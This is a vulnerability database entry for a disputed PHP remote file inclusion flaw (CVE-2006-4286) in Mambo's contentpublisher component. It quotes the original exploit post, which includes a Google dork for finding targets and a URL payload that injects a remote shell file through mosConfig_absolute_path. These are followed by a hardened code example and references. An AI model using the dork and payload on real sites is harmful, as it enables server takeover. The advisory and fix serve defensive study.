Mambo contentpublisher component 'contentpublisher.php' PHP remote file inclusion vulnerability

Vulnerability ID: 1193756    Vulnerability type: Unknown
Published: 2006-08-22    Updated: 2006-12-11
CVE ID: CVE-2006-4286    CNNVD-ID: CNNVD-200608-358
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006080140
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-358
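|Vulnerability details
**Disputed** A PHP remote file inclusion vulnerability exists in the contentpublisher.php script of the contentpublisher component (com_contentpublisher) for Mambo. Remote attackers can execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. Note: a third party disputes this issue, stating that the contentpublisher.php script in most recent versions does not support direct requests. Information provided by the original researcher is frequently wrong.
|Exploit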
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

--------------------------------------------------------------------------------

Title : contentpublisher Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

#Author: Crackers_Child

#cont@ct: crackers_child (at) sibersavascilar (dot) com

--------------------------------------------------------------------------------

Google Dorks  : inurl:"/com_contentpublisher/"

--------------------------------------------------------------------------------

Application :  contentpublisher/  Component of Mambo

--------------------------------------------------------------------------------

Bug in contentpublisher.php

global $my, $mosConfig_live_site, $mosConfig_lang;
if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php')) {
    include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php');
} else {
    include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/english.php');
}

--------------------------------------------------------------------------------

Exploit:

http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------

greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
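
A hardened form of the language include quoted in the advisory above, as an added example that is not code from the advisory or from the contentpublisher project. It assumes Mambo's entry point defines _VALID_MOS before loading components and that the direct-request check mentioned in the dispute note is of this kind; cp_language_file() is a hypothetical helper name.

```php
<?php
// Added example, not the component's own code.
// Assumption: Mambo's index.php defines _VALID_MOS before it loads a component,
// so a direct request to this file stops here and request data never reaches
// the include path below.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// Inside Mambo both values are set by configuration.php, not by the request.
global $mosConfig_absolute_path, $mosConfig_lang;

/**
 * Hypothetical helper: return the absolute path of the language file to load,
 * or null if no acceptable file exists.
 */
function cp_language_file($basePath, $lang)
{
    // realpath() resolves local filesystem paths only; a URL in $basePath
    // does not resolve to an existing directory and yields false.
    $dir = realpath($basePath . '/components/com_contentpublisher/languages');
    if ($dir === false) {
        return null;
    }

    // Accept only a simple language name; anything else falls back to English.
    if (!is_string($lang) || !preg_match('/^[a-z0-9_-]{1,32}$/i', $lang)) {
        $lang = 'english';
    }

    foreach (array($lang, 'english') as $candidate) {
        $file = realpath($dir . '/' . $candidate . '.php');
        // The prefix check keeps the resolved file inside the languages directory.
        if ($file !== false && strpos($file, $dir . DIRECTORY_SEPARATOR) === 0) {
            return $file;
        }
    }
    return null;
}

$cpLangFile = cp_language_file($mosConfig_absolute_path, $mosConfig_lang);
if ($cpLangFile === null) {
    die('contentpublisher: language file not found');
}
include $cpLangFile;
```

On PHP 5.2.0 and later, leaving allow_url_include at its default of Off additionally prevents include() from fetching a URL even if a path variable is attacker-controlled.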
|References

Source: BUGTRAQ
Name: 20060817 contentpublisher Mambo Component Remote File Include Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/443626/100/0/threaded
Source: BUGTRAQ
Name: 20060823 Re: contentpublisher Mambo Component Remote File Include Vulnerabilities
Link: http://www.securityfocus.com/archive/1/444244/100/0/threaded
Source: OSVDB
Name: 28093
Link: http://www.osvdb.org/28093
Source: SREASON
Name: 1431
Link: http://securityreason.com/securityalert/1431